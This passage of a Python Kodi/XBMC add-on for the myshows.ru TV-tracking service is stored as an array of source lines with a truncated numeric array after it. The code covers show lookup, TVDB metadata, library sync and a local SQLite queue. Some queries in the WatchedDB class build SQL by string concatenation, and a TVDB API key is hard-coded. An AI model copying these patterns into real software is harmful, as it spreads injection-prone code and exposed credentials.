rateOK '+str(rateOK))\n", " else:\n", " rateOK=True\n", " if rateOK or rateandcheck=='false':\n", " if str(showId) not in self.jdatashows or self.jdatashows[str(showId)]['watchStatus']!='watching':\n", " #Debug('[doaction]: New show! Marking as watching')\n", " Change_Status_Show(str(showId), 'watching', 'http://api.myshows.ru/profile/shows/')\n", " xbmc.sleep(500)\n", " #Debug('[TEST][doaction]: Start Change_Status_Episode')\n", " #xbmc.sleep(500)\n", " Change_Status_Episode(showId, id, action, '0', 'http://api.myshows.ru/profile/shows/'+str(showId)+'/', self.title)\n", "\n", " def showtitle2showId(self):\n", " try:showtitle=self.match['showtitle'].decode('utf-8','ignore')\n", " except:showtitle=self.match['showtitle']\n", " if 'tvdb_id' in self.match:\n", " tvdb_id=self.match['tvdb_id']\n", " else:\n", " tvdb_id=None\n", "\n", " for showId in self.jdatashows:\n", " if showtitle==self.jdatashows[showId]['ruTitle'] or showtitle==self.jdatashows[showId]['title']:\n", " return int(showId)\n", " Debug('[showtitle2showId] '+unicode(showtitle))\n", " jload=Data(cookie_auth, 'http://api.myshows.ru/shows/search/?q=%s' % urllib.quote_plus(showtitle.encode('utf-8', 'ignore'))).get()\n", " if jload:\n", " jdata = json.loads(jload)\n", " Debug('[showtitle2showId] Search '+unicode(jload))\n", " else:\n", " if tvdb_id:\n", " html=get_html_source(\"http://thetvdb.com/api/33DBB309BB2B0ADB/series/%s/en.xml\" % tvdb_id)\n", " if re.findall('<SeriesName>(.+?)</SeriesName>', html, re.DOTALL)[0]:\n", " showtitle=re.findall('<SeriesName>(.+?)</SeriesName>', html, re.DOTALL)[0]\n", " Debug('[showtitle2showId] After [tvdb_id] '+showtitle)\n", " jload=Data(cookie_auth, 'http://api.myshows.ru/shows/search/?q=%s' % urllib.quote_plus(showtitle.encode('utf-8', 'ignore'))).get()\n", " if jload: jdata = json.loads(jload)\n", " else: return\n", " select_show=[]\n", " showIds=[]\n", " for showId in jdata:\n", " select_show.append((jdata[showId]['title'], showId, 
int(jdata[showId]['watching'])))\n", " if unicode(showtitle).lower()==unicode(jdata[showId]['ruTitle']).lower() or unicode(showtitle).lower()==unicode(jdata[showId]['title']).lower():\n", " showIds.append(showId)\n", " theshowId=showId\n", " if len(showIds)==1:\n", " return int(theshowId)\n", " select_show=sorted(select_show, key=lambda x: x[2], reverse=True)\n", " showtitles=[]\n", " showIds=[]\n", " showId=None\n", " for x in select_show:\n", " showtitles.append(x[0])\n", " showIds.append(x[1])\n", " if len(showIds)==1:\n", " showId=int(showIds[0])\n", " else:\n", " dialog = xbmcgui.Dialog()\n", " ret = dialog.select(unicode(__language__(30289)), showtitles)\n", " if ret!=-1:\n", " showId=int(showIds[ret])\n", " if showId:\n", " return showId\n", "\n", " def getid(self, showId, seasonNumber, episodeId, lable=None):\n", " data= Data(cookie_auth, 'http://api.myshows.ru/shows/'+str(showId)).get()\n", " jdata = json.loads(data)\n", " if seasonNumber and int(seasonNumber)>0 and episodeId:\n", " for id in jdata['episodes']:\n", " if jdata['episodes'][id]['seasonNumber']==int(seasonNumber) and jdata['episodes'][id]['episodeNumber']==int(episodeId):\n", " return int(id)\n", " episodes=[]\n", " for id in jdata['episodes']:\n", " episodes.append((id, jdata['episodes'][id]['title'], jdata['episodes'][id]['seasonNumber']))\n", " if lable and jdata['episodes'][id]['title']==lable:\n", " return int(id)\n", " if len(episodes)==1:\n", " return int(episodes)\n", " episodes=sorted(episodes, key=lambda x: x[0], reverse=True)\n", " eptitles=[]\n", " ids=[]\n", " for x in episodes:\n", " eptitles.append('S'+int_xx(x[2])+' '+x[1])\n", " ids.append(x[0])\n", " dialog = xbmcgui.Dialog()\n", " ret = dialog.select(unicode(__language__(30289)), eptitles)\n", " if ret!=-1:\n", " return int(ids[ret])\n", "\n", " def get_menu(self):\n", " if self.menu:\n", " return self.menu\n", " else:\n", " return self.GetFromXBMC()\n", "\n", " def list(self):\n", " self.menu=self.get_menu()\n", " for i in 
self.menu:\n", " item = xbmcgui.ListItem(i['title'], iconImage='DefaultFolder.png', thumbnailImage=i['thumbnail'])\n", " item=self.shows(i['title'],item)\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url='', listitem=item, isFolder=True)\n", "\n", " def shows(self, title, item, info=None, avatar=False):\n", " if not self.menu and not self.useTVDB:\n", " return item\n", "\n", " if self.useTVDB:\n", " #Debug('[shows][useTVDB]:'+info['tvshowtitle'])\n", " #Debug('[shows][useTVDB]:'+info['title'])\n", " try:info['title']=info['title'].decode('utf-8','ignore')\n", " except:pass\n", " try:info['tvshowtitle']=info['tvshowtitle'].decode('utf-8','ignore')\n", " except:pass\n", " meta=self.TVDB.scraper('tvdb', {'label':info['title'], 'search':[info['tvshowtitle'],info['title']], 'year':info['year']})\n", "\n", " if not meta:\n", " return item\n", "\n", " item=self.itemTVDB(item,meta,avatar)\n", " try:\n", " #if 1==1:\n", " #print str(meta)\n", " if 'title' in info:\n", " meta['info']['title']=info['title']\n", " if 'rating' in info:\n", " meta['info']['rating']=info['rating']\n", " if 'votes' in info:\n", " meta['info']['votes']=info['votes']\n", " if 'plot' in info:\n", " meta['info']['plot']=meta['info']['plot'].replace('&quot;','\"')+'\\r\\n'+info['plot']\n", " elif 'plot' in meta['info'] and meta['info']['plot']:\n", " meta['info']['plot']=meta['info']['plot'].replace('&quot;','\"')\n", " if 'playcount' in info:\n", " meta['info']['playcount']=info['playcount']\n", " if 'episode' in info:\n", " meta['info']['episode']=info['episode']\n", " #print str(meta)\n", "\n", " except:pass\n", " item.setInfo(type='Video', infoLabels=meta['info'] )\n", " return item\n", "\n", " self.menu=self.get_menu()\n", " for i in range(len(self.menu)):\n", " try:\n", " if title in self.menu[i]['title']:\n", " item.setProperty('fanart_image', self.menu[i]['fanart'])\n", "\n", " for studio_info in self.menu[i]['studio']:\n", " try: studio+=', '+studio_info\n", " except: 
studio=studio_info\n", " self.menu[i]['studio']=studio.encode('utf-8')\n", "\n", " for genre_info in self.menu[i]['genre']:\n", " try: genre+=', '+genre_info\n", " except: genre=genre_info\n", " self.menu[i]['genre']=genre.encode('utf-8')\n", "\n", " if info:\n", " self.menu[i]['title']=info['title']\n", " self.menu[i]['playcount']=0\n", " self.menu[i]['plot']=info['plot']+self.menu[i]['plot']\n", " break\n", " except:pass\n", " try: item.setInfo( type='Video', infoLabels=self.menu[i] )\n", " except: item.setInfo( type='Video', infoLabels=info)\n", "\n", " return item\n", "\n", " def episodes_meta(self, info):\n", " meta=self.TVDB.scraper('tvdb', {'label':info['label'], 'search':info['label'], 'year':str(info['year'])})\n", " if not meta: return\n", " banners=self.TVDB.scraper('tvdb', {'label':info['label'], 'search':info['label'], 'year':str(info['year']), 'season':True})\n", " return meta, banners\n", "\n", " def episodes(self, title, item, info, meta=None):\n", " if not self.menu and not self.useTVDB:\n", " return item\n", "\n", " if self.useTVDB and meta:\n", " item=self.itemTVDB(item,meta)\n", " try:\n", " #if 1==1:\n", " #print str(meta)\n", " meta['info']['title']=info['title']\n", " meta['info']['rating']=info['rating']\n", " meta['info']['votes']=info['votes']\n", " if 'playcount' in info:\n", " meta['info']['playcount']=info['playcount']\n", " if 'plot' in info and info['plot']:\n", " meta['info']['plot']=info['plot']\n", " except:pass\n", " item.setInfo(type='Video', infoLabels=meta['info'] )\n", " return item\n", "\n", " self.menu=self.get_menu()\n", " for i in range(len(self.menu)):\n", " if title in self.menu[i]['title']:\n", " #Debug('episodes:'+title+' '+str(self.menu[i]['title']))\n", " item.setProperty('fanart_image', self.menu[i]['fanart'])\n", " break\n", " item.setInfo( type='Video', infoLabels=info )\n", " return item\n", "\n", " def episode(self, title, seasonId, episodeNumber):\n", " self.menu=self.get_menu()\n", " if not self.menu:\n", " 
return False\n", " for i in range(len(self.menu)):\n", " if title in self.menu[i]['title']:\n", " for episode in self.menu[i]['episodes']:\n", " if episode['episode']==episodeNumber and episode['season']==seasonId:\n", " return True\n", " return False\n", "\n", " def episode_fanart(self, info):\n", " if self.useTVDB:\n", " meta=self.TVDB.scraper('tvdb', {'label':info['label'], 'search':info['label'], 'year':str(info['year'])})\n", "\n", " if not meta:\n", " return ''\n", " else:\n", " return meta['properties']['fanart_image']\n", "\n", " self.menu=self.get_menu()\n", " if not self.menu:\n", " return ''\n", " for i in range(len(self.menu)):\n", " try:\n", " if info['title'] in self.menu[i]['title']:\n", " return self.menu[i]['fanart']\n", " except:pass\n", " return ''\n", "\n", " def GetFromXBMC(self):\n", " from utilities import xbmcJsonRequest\n", " Debug('[Episodes Sync] Getting episodes from XBMC')\n", "\n", " shows = xbmcJsonRequest({'jsonrpc': '2.0', 'method': 'VideoLibrary.GetTVShows', 'params': {'properties': ['title', 'originaltitle', 'genre', 'year', 'rating', 'plot', 'studio', 'mpaa', 'cast', 'imdbnumber', 'premiered', 'votes', 'fanart', 'thumbnail', 'episodeguide', 'playcount', 'season', 'episode', 'tag']}, 'id': 0})\n", "\n", " # sanity check, test for empty result\n", " if not shows:\n", " Debug('[Episodes Sync] xbmc json request was empty.')\n", " return\n", "\n", " # test to see if tvshows key exists in xbmc json request\n", " if 'tvshows' in shows:\n", " shows = shows['tvshows']\n", " #Debug(\"[Episodes Sync] XBMC JSON Result: '%s'\" % str(shows))\n", " else:\n", " Debug(\"[Episodes Sync] Key 'tvshows' not found\")\n", " return\n", "\n", " for show in shows:\n", " show['episodes'] = []\n", "\n", " episodes = xbmcJsonRequest({'jsonrpc': '2.0', 'method': 'VideoLibrary.GetEpisodes', 'params': {'tvshowid': show['tvshowid'], 'properties': ['season', 'episode', 'playcount', 'uniqueid', 'file']}, 'id': 0})\n", " if 'episodes' in episodes:\n", " episodes = 
episodes['episodes']\n", "\n", " show['episodes'] = [x for x in episodes if type(x) == type(dict())]\n", "\n", " self.xbmc_shows = [x for x in shows if x['episodes']]\n", " return shows\n", "\n", " def itemTVDB(self, item, kwarg, avatar=False):\n", " #Debug('[itemTVDB]:meta '+str(kwarg))\n", " if 'title' in kwarg and kwarg['title']:\n", " item.setLabel(kwarg['title'])\n", "\n", " if 'label' in kwarg and kwarg['label']:\n", " item.setLabel2(kwarg['label'])\n", "\n", " if not avatar and 'icon' in kwarg and kwarg['icon']:\n", " item.setIconImage(kwarg['icon'])\n", "\n", " if not avatar and 'thumbnail' in kwarg and kwarg['thumbnail']:\n", " item.setThumbnailImage(kwarg['thumbnail'])\n", "\n", " if 'properties' in kwarg and kwarg['properties']:\n", " for key, value in kwarg['properties'].iteritems():\n", " item.setProperty(key, str(value))\n", "\n", " return item\n", "\n", "class WatchedDB:\n", " def __init__(self):\n", " dirname = xbmc.translatePath('special://temp')\n", " for subdir in ('xbmcup', sys.argv[0].replace('plugin://', '').replace('/', '')):\n", " dirname = os.path.join(dirname, subdir)\n", " if not xbmcvfs.exists(dirname):\n", " xbmcvfs.mkdir(dirname)\n", " self.dbfilename = os.path.join(dirname, 'data.db3')\n", " if not xbmcvfs.exists(self.dbfilename):\n", " creat_db(self.dbfilename)\n", " self.dialog = xbmcgui.Dialog()\n", "\n", " def _get(self, id):\n", " self._connect()\n", " Debug('[WatchedDB][_get]: Checking '+id)\n", " id=id.replace(\"'\",\"<&amp>\").decode('utf-8','ignore')\n", " self.where=\" where id='%s'\" % (id)\n", " #if 1==1:\n", " try:\n", " self.cur.execute('select rating from watched'+self.where)\n", " except:\n", " #else:\n", " self.cur.execute('create table watched(addtime integer, rating integer, id varchar(32) PRIMARY KEY)')\n", " self.cur.execute('select rating from watched'+self.where)\n", " res=self.cur.fetchone()\n", " self._close()\n", " return res[0] if res else None\n", "\n", " def _get_all(self):\n", " self._connect()\n", " 
self.cur.execute('select id, rating from watched order by addtime desc')\n", " res = [[unicode(x[0]).replace(\"<&amp>\",\"'\").encode('utf-8','ignore'),x[1]] for x in self.cur.fetchall()]\n", " self._close()\n", " return res\n", "\n", " def check(self, id, rating=0):\n", " ok1,ok3=None,None\n", " db_rating=self._get(id)\n", " title=titlesync(id)\n", " if getSettingAsBool(\"silentoffline\"):\n", " if db_rating==None and rating>=0:\n", " showMessage(__language__(30520),__language__(30522) % (str(rating)))\n", " ok1=True\n", " elif db_rating>=0 and rating!=db_rating:\n", " showMessage(__language__(30520),__language__(30523) % (str(rating)))\n", " ok3=True\n", " elif db_rating!=None and rating==db_rating:\n", " showMessage(__language__(30520),__language__(30524) % (str(rating)))\n", " else:\n", " if db_rating==None and rating>=0:\n", " ok1=self.dialog.yesno(__language__(30520),__language__(30525) % (str(rating)), str(title))\n", " elif db_rating and rating!=db_rating:\n", " ok3=self.dialog.yesno(__language__(30520),__language__(30526) % (str(db_rating), str(rating)),str(title))\n", " elif db_rating==0 and rating!=db_rating:\n", " ok3=True\n", " elif db_rating!=None and rating==db_rating:\n", " showMessage(__language__(30520),__language__(30527) % (str(rating)))\n", "\n", " Debug('[WatchedDB][check]: rating: %s DB: %s, ok1: %s, ok3: %s' % (str(rating), str(db_rating), str(ok1), str(ok3)))\n", "\n", " if ok1:\n", " self._add(id, rating)\n", " return True\n", " if ok3:\n", " self._delete(id)\n", " self._add(id, rating)\n", " return True\n", "\n", " def onaccess(self):\n", " #Debug('[WatchedDB][onaccess]: Start')\n", " self._connect()\n", " self.cur.execute('select count(id) from watched')\n", " x=self.cur.fetchone()\n", " res=int(x[0])\n", " self._close()\n", " i=0\n", "\n", " if res>0:\n", " #Debug('[WatchedDB][onaccess]: Found %s' % (str(res)))\n", " silentofflinesend=getSettingAsBool('silentofflinesend')\n", " if not silentofflinesend: 
ok2=self.dialog.yesno(__language__(30521),__language__(30528) % (str(res)), __language__(30529))\n", " else: ok2=True\n", " if ok2:\n", " for id,rating in self._get_all():\n", " j=SyncXBMC(id,int(rating)).doaction()\n", " i=i+int(j)\n", " self._delete(id)\n", " showMessage(__language__(30521),__language__(30530) % (i))\n", " else:\n", " ok2=self.dialog.yesno(__language__(30521),__language__(30531) % (str(res)))\n", " if ok2:\n", " for id,rating in self._get_all():\n", " self._delete(id)\n", " return res\n", "\n", " def _add(self, id, rating=0):\n", " self._connect()\n", " id=id.replace(\"'\",\"<&amp>\").decode('utf-8','ignore')\n", " Debug('[WatchedDB][_add]: Adding %s with rate %d' % (id, rating))\n", " self.cur.execute('insert into watched(addtime, rating, id) values(?,?,?)', (int(time.time()), int(rating), id))\n", " self.db.commit()\n", " self._close()\n", "\n", " def _delete(self, id):\n", " self._connect()\n", " id=id.replace(\"'\",\"<&amp>\").decode('utf-8','ignore')\n", " self.cur.execute(\"delete from watched where id=('\"+id+\"')\")\n", " self.db.commit()\n", " self._close()\n", "\n", " def _connect(self):\n", " self.db = sqlite.connect(self.dbfilename)\n", " self.cur = self.db.cursor()\n", "\n", " def _close(self):\n", " self.cur.close()\n", " self.db.close()\n", "\n", "def Test():\n", " #SyncXBMC()\n", " #RunPlugin='{\"mode\": \"60\", \"argv\": {\"content\": \"videos\"}}'\n", " #xbmc.executebuiltin('XBMC.RunPlugin('+sys.argv[0]+'?'+urllib.quote_plus(RunPlugin)+')')\n", " #print Rate('9237', '2031031', 'http://api.myshows.ru/profile/shows/9237/', True)\n", " #PluginStatus().use('myshows')\n", " '''\n", " import libtorrent\n", " for filename in xbmcvfs.listdir(r'D:\\torrents')[1]:\n", " filelist=[]\n", " tor=os.path.join('D:\\\\','torrents',filename)\n", " torrentFileInfo = libtorrent.torrent_info(tor)\n", " s=torrentFileInfo.files()\n", " for f in s:\n", " if '\\\\' not in f.path[f.path.find('\\\\')+1:]:\n", " 
filelist.append(f.path[f.path.find('\\\\')+1:])\n", " print 'filelist.append('+str(filelist)+')'\n", " pass'''\n", "\n", " #data={'item': {'label': u'\\u041a\\u043b\\u043e\\u0434 \\u0432 \\u043f\\u043e\\u043c\\u043e\\u0449\\u044c (2012)'}}\n", " #file=data['item'][\"label\"]\n", " #file=file.replace('.',' ').replace('_',' ').replace('[',' ').replace(']',' ').replace('(',' ').replace(')',' ').strip()\n", " #match=re.compile('(.+) (\\d{4})( |$)', re.I | re.IGNORECASE).findall(file)\n", " #if match:\n", " # data[\"title\"], data[\"year\"] = match[0][0],match[0][1]\n", " # data[\"type\"] = \"movie\"\n", " # data[\"year\"]=int(data[\"year\"])\n", " # data[\"title\"]=data[\"title\"].strip()\n", " # kinorate(data['title'],data['year'])\n", "\n", " #data={\"year\": \"2013\", \"titleAlt\": \"\\u041f\\u0440\\u043e\\u043a\\u043b\\u044f\\u0442\\u0438\\u0435 \\u043c\\u0443\\u043b\\u044c\\u0442\\u0438\\u0432\\u044b\\u0431\\u043e\\u0440\\u0430 \\u043f\\u0440\\u0435\\u0432\\u0440\\u0430\\u0442\\u0438\\u043b\\u043e \\u043c\\u043e\\u044e \\u0436\\u0438\\u0437\\u043d\\u044c \\u0432 \\u0430\\u0434\", \"title\": \"Ore no N\\u014dnai Sentakushi ga, Gakuen Love Come o Zenryoku de Jama S\"}\n", " #kinorate(data['title'],data['year'],titleAlt=data['titleAlt'])\n", " #kinorate('Мальчишник Часть 3',2013)\n", " #RateShow(24199).count()\n", " #Rate('24199', '0',None)\n", " #title='{\"tvshowid\": 35, \"episode\": 9, \"season\": 1, \"tvdb_id\": \"79044\", \"episodeid\": 964, \"label\": \"That Brooch Was So Heavy\", \"uniqueid\": {\"unknown\": \"305749\"}, \"year\": 2005, \"showtitle\": \"Honey and Clover\"}'\n", " #title='{\"tvshowid\": 35, \"episode\": 9, \"season\": 1, \"tvdb_id\": \"79044\", \"episodeid\": 964, \"label\": \"That Brooch Was So Heavy\", \"uniqueid\": {\"unknown\": \"305749\"}, \"year\": 2005, \"showtitle\": \"Интерны\"}'\n", " title='{\"tvshowid\": 51, \"episode\": 10, \"uniqueid\": {\"unknown\": \"4606529\"}, \"season\": 1, \"tvdb_id\": \"269877\", \"episodeid\": 1204, 
\"label\": \"The Best of the Student Council (Photos)\", \"file\": \"smb://192.168.0.2/xbmc_seriez/Love Lab/Season 1/Love.Lab.S01E10.mkv\", \"year\": 2013, \"showtitle\": \"Love Lab\"}'\n", " #try:\n", " # SyncXBMC(title).doaction()\n", " #except ValueError or AttributeError:\n", " # FakeRate(title)\n", " #FakeRate(title)\n", " #WatchedDB().onaccess()\n", " folder=u'D:\\\\seriez\\\\xxx1и\\\\'\n", " folder=folder.encode('utf-8','ignore')\n", " subtitledirs=xbmcvfs.listdir(folder)[0]\n", " for d in subtitledirs:\n", " for x in xbmcvfs.listdir(folder+os.sep+d)[0]:\n", " subtitledirs.append(d+os.sep+x)\n", " if len(subtitledirs)>0:\n", " subtitledirs.insert(0,__language__(30505))\n", " ret = xbmcgui.Dialog().select(__language__(30506), subtitledirs)\n", "\n", "params = get_params()\n", "try: apps=get_apps()\n", "except: pass\n", "\n", "\n", "showId = None\n", "title = None\n", "mode = None\n", "seasonNumber = None\n", "id = None\n", "action = None\n", "playcount = None\n", "sort = None\n", "episodeId = None\n", "refresh_url = None\n", "stringdata = None\n", "\n", "\n", "try: title = urllib.unquote_plus(params['title'])\n", "except: pass\n", "try: showId = urllib.unquote_plus(params['showId'])\n", "except: pass\n", "try: seasonNumber = urllib.unquote_plus(params['seasonNumber'])\n", "except: pass\n", "try: mode = int(params['mode'])\n", "except: pass\n", "try: mode = int(apps['mode'])\n", "except: pass\n", "try: id = urllib.unquote_plus(str(params['id']))\n", "except: pass\n", "try: episodeId = urllib.unquote_plus(str(params['episodeId']))\n", "except: pass\n", "try: playcount = str(params['playcount'])\n", "except: pass\n", "try: action = urllib.unquote_plus(params['action'])\n", "except: pass\n", "try: sort = str(params['sort'])\n", "except: pass\n", "try: refresh_url = urllib.unquote_plus(params['refresh_url'])\n", "except: pass\n", "try: stringdata = urllib.unquote_plus(params['stringdata'])\n", "except: pass\n", "\n", "try: title = 
urllib.unquote_plus(apps['title'])\n", "except: pass\n", "try: showId = str(urllib.unquote_plus(apps['argv']['showId']))\n", "except: pass\n", "try: seasonNumber = str(urllib.unquote_plus(apps['argv']['seasonNumber']))\n", "except: pass\n", "try: mode = int(apps['mode'])\n", "except: pass\n", "try: id = urllib.unquote_plus(str(apps['argv']['id']))\n", "except: pass\n", "try: episodeId = urllib.unquote_plus(str(apps['argv']['episodeId']))\n", "except: pass\n", "try: playcount = str(apps['argv']['playcount'])\n", "except: pass\n", "try: action = urllib.unquote_plus(apps['argv']['action'])\n", "except: pass\n", "try: sort = str(apps['argv']['sort'])\n", "except: pass\n", "try: refresh_url = urllib.unquote_plus(apps['argv']['refresh_url'])\n", "except: pass\n", "try: stringdata = urllib.unquote_plus(apps['argv']['stringdata'])\n", "except: pass\n", "\n", "if mode == None:\n", " Main()\n", "elif mode==1:\n", " import shutil\n", " ru=os.path.join(__addonpath__, u'resources',u'language',u'Russian')\n", " en=os.path.join(__addonpath__, u'resources',u'language',u'English')\n", " shutil.move(os.path.join(en, u'strings.xml'), os.path.join(en, u'old_strings.xml'))\n", " shutil.copy(os.path.join(ru, u'strings.xml'), en)\n", " showMessage(__language__(30208), __language__(30533))\n", "elif mode >= 10 and mode <19:\n", " Shows()\n", " xbmcplugin.addSortMethod(handle=int(sys.argv[1]), sortMethod=xbmcplugin.SORT_METHOD_VIDEO_TITLE)\n", "elif mode == 19:\n", " Shows()\n", " xbmcplugin.addSortMethod(handle=int(sys.argv[1]), sortMethod=xbmcplugin.SORT_METHOD_VIDEO_RATING)\n", "elif mode == 20:\n", " Seasons(showId)\n", "elif mode == 25:\n", " Episodes(showId, seasonNumber)\n", " xbmcplugin.addSortMethod(handle=int(sys.argv[1]), sortMethod=xbmcplugin.SORT_METHOD_EPISODE)\n", "elif mode == 27:\n", " xbmcplugin.addSortMethod(handle=int(sys.argv[1]), sortMethod=xbmcplugin.SORT_METHOD_DATE)\n", " if not sort:\n", " EpisodeList('unwatched')\n", " else:\n", " ShowList('unwatched')\n", "elif 
mode == 28:\n", " xbmcplugin.addSortMethod(handle=int(sys.argv[1]), sortMethod=xbmcplugin.SORT_METHOD_DATE)\n", " if not sort:\n", " EpisodeList('next')\n", " else:\n", " ShowList('next')\n", "elif mode == 30:\n", " EpisodeMenu(id, playcount, refresh_url)\n", "elif mode == 40:\n", " FriendsNews()\n", "elif mode == 41:\n", " if action==None: action=login\n", " if sort==None: sort='profile'\n", " Profile(action, sort)\n", "elif mode == 50:\n", " MyTorrents()\n", "elif mode == 51:\n", " MyScanList()\n", "elif mode == 52:\n", " uTorrentBrowser()\n", "elif mode == 60:\n", " ClearCache()\n", "elif mode == 61:\n", " PluginStatus().menu()\n", "elif mode == 62:\n", " ExtraFunction()\n", "elif mode == 70:\n", " #if 1==0:\n", " try:\n", " SyncXBMC(title).doaction()\n", " Debug('[mode 70]: SyncXBMC(title).doaction() success')\n", " except ValueError or AttributeError:\n", " Debug('[mode 70]: ValueError or AttributeError, start FakeRate for %s' % (title))\n", " if action=='check':\n", " FakeRate(title)\n", "elif mode == 71:\n", " try:\n", " get_data= get_url(cookie_auth, 'http://api.myshows.ru/profile/news/')\n", " WatchedDB().onaccess()\n", " except:\n", " showMessage(__language__(30520),__language__(30532))\n", "elif mode in (2571,5171,302071,3071):\n", " MoveToXBMC()\n", "elif mode == 610:\n", " PluginStatus().install(action)\n", "elif mode == 611:\n", " PluginStatus().install_plugin(action)\n", "elif mode == 100:\n", " if not action: action='all'\n", " TopShows(action)\n", "elif mode == 200:\n", " Change_Status_Show(showId, action, refresh_url)\n", "elif mode in (206,256,306):\n", " xbmc.executebuiltin(\"Action(Info)\")\n", "elif mode == 250:\n", " Change_Status_Season(showId, seasonNumber, action, refresh_url)\n", "elif mode in (251,201,302):\n", " Rate(showId, id, refresh_url)\n", "elif mode == 300:\n", " Change_Status_Episode(showId, id, action, playcount, refresh_url)\n", "elif mode == 3000 or mode == 2500:\n", " VKSearch(showId, id)\n", "elif mode == 3010:\n", " 
Source().addsource()\n", " jdata=get_apps(stringdata)\n", " #Debug('[Input]'+str((jdata,action,sort)))\n", " if not sort:AskPlay()\n", " elif sort=='activate':\n", " if action!='silent': gotoCheckPoint()\n", " if action=='download' or action=='silent':\n", " DownloadSource()\n", " elif not jdata['id']:\n", " ScanSource().scanone()\n", "elif mode == 3011:\n", " Source().addjson()\n", "elif mode == 3012:\n", " Serialu().add()\n", "elif mode == 3013:\n", " gotoCheckPoint()\n", "elif mode == 3020:\n", " PlayFile()\n", "elif mode == 3090:\n", " AskPlay()\n", "elif mode == 301 or mode == 252:\n", " Favorite(id, refresh_url)\n", "elif mode in (500,258):\n", " DeleteSourses()\n", "elif mode == 510:\n", " ScanAll()\n", "elif mode in (30202,259):\n", " ScanSource().scanone()\n", "elif mode == 302001:\n", " ScanSource().add()\n", "elif mode == 302002:\n", " ScanSource().delete()\n", "elif mode in (30200,257):\n", " DeleteSource()\n", "elif mode in (30201,25201):\n", " DownloadSource(stringdata)\n", "elif mode == 303 or mode==203 or mode==253:\n", " AddSource()\n", "elif mode == 304 or mode==204 or mode==254:\n", " PlaySource()\n", "elif mode in (205,255):\n", " ontop('update', stringdata)\n", "elif mode == 999:\n", " Test()\n", "\n", "xbmcplugin.endOfDirectory(int(sys.argv[1]))" ]
[ 0, 0, 0.024390243902439025, 0.018867924528301886, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.023809523809523808, 0.024390243902439025, 0.017543859649122806, 0.0196078431372549, 0.030303030303030304, 0, 0.02040816326530612, 0.02857142857142857, 0.020833333333333332, 0.014925373134328358, 0.02197802197802198, 0.017543859649122806, 0.017094017094017096, 0, 0, 0, 0, 0.043478260869565216, 0, 0.047619047619047616, 0, 0.047619047619047616, 0.017543859649122806, 0.05, 0.02631578947368421, 0.03571428571428571, 0.06956521739130435, 0.06956521739130435, 0.06956521739130435, 0.06956521739130435, 0.05982905982905983, 0.0603448275862069, 0.05333333333333334, 0, 0.06956521739130435, 0.06060606060606061, 0.06363636363636363, 0.06422018348623854, 0.06422018348623854, 0.06306306306306306, 0.018867924528301886, 0.05, 0, 0.017857142857142856, 0, 0, 0, 0, 0, 0.05405405405405406, 0.06382978723404255, 0.012195121951219513, 0, 0.037037037037037035, 0, 0.047619047619047616, 0.043478260869565216, 0.043478260869565216, 0.043478260869565216, 0.04285714285714286, 0, 0, 0, 0.07692307692307693, 0.06666666666666667, 0.10714285714285714, 0, 0, 0.045454545454545456, 0.058823529411764705, 0, 0.02, 0, 0, 0.015384615384615385, 0.01818181818181818, 0, 0, 0, 0.014084507042253521, 0, 0.047619047619047616, 0, 0, 0.058823529411764705, 0, 0.041666666666666664, 0.009708737864077669, 0.09090909090909091, 0, 0, 0.058823529411764705, 0.07407407407407407, 0.06172839506172839, 0.06172839506172839, 0.06172839506172839, 0.06172839506172839, 0.07317073170731707, 0.041666666666666664, 0.039473684210526314, 0, 0, 0.022727272727272728, 0.021739130434782608, 0, 0, 0, 0.04, 0.017857142857142856, 0.01694915254237288, 0, 0.024390243902439025, 0, 0.07894736842105263, 0.028368794326241134, 0, 0.025974025974025976, 0, 0.028985507246376812, 0, 0.027777777777777776, 0, 0.0273972602739726, 0, 0, 0.047619047619047616, 0.02, 0, 0.02, 0.02564102564102564, 0, 0.00847457627118644, 0.025974025974025976, 0, 0.011494252873563218, 
0.12903225806451613, 0.02531645569620253, 0.03389830508474576, 0.06818181818181818, 0.02127659574468085, 0.008547008547008548, 0.0125, 0.009615384615384616, 0, 0.047619047619047616, 0.014925373134328358, 0.06666666666666667, 0.10714285714285714, 0, 0.037037037037037035, 0, 0, 0.01694915254237288, 0, 0, 0.020833333333333332, 0, 0.013245033112582781, 0, 0.022988505747126436, 0.03636363636363636, 0.0967741935483871, 0.0625, 0, 0.020833333333333332, 0.029850746268656716, 0, 0.05357142857142857, 0, 0.013157894736842105, 0, 0.016129032258064516, 0.01818181818181818, 0.0625, 0.007194244604316547, 0.011235955056179775, 0.061224489795918366, 0.07692307692307693, 0.0625, 0.04504504504504504, 0.13636363636363635, 0.038461538461538464, 0, 0.014285714285714285, 0, 0.016666666666666666, 0.017241379310344827, 0.05, 0, 0.012987012987012988, 0.0125, 0.009615384615384616, 0, 0.027777777777777776, 0.07692307692307693, 0.01694915254237288, 0.014084507042253521, 0.02197802197802198, 0, 0.058823529411764705, 0.09375, 0, 0.03389830508474576, 0.09090909090909091, 0.05, 0, 0.046875, 0.02, 0, 0, 0.0136986301369863, 0, 0.03125, 0, 0.015151515151515152, 0.05714285714285714, 0, 0.03125, 0.034482758620689655, 0.01744186046511628, 0.01818181818181818, 0.020202020202020204, 0.004901960784313725, 0.013888888888888888, 0, 0.009345794392523364, 0.009523809523809525, 0.008928571428571428, 0, 0, 0.011494252873563218, 0.011494252873563218, 0.012048192771084338, 0.012345679012345678, 0.010101010101010102, 0.009900990099009901, 0.024096385542168676, 0.03614457831325301, 0.014705882352941176, 0.004098360655737705, 0.023529411764705882, 0.022727272727272728, 0.022727272727272728, 0.008849557522123894, 0, 0.022222222222222223, 0.03225806451612903, 0, 0, 0, 0, 0, 0.05555555555555555, 0.05, 0.1, 0.058823529411764705, 0.041666666666666664, 0.041666666666666664, 0.047058823529411764, 0, 0.022727272727272728, 0.021739130434782608, 0, 0, 0.0136986301369863, 0, 0, 0.045454545454545456, 0.05, 0.03225806451612903, 
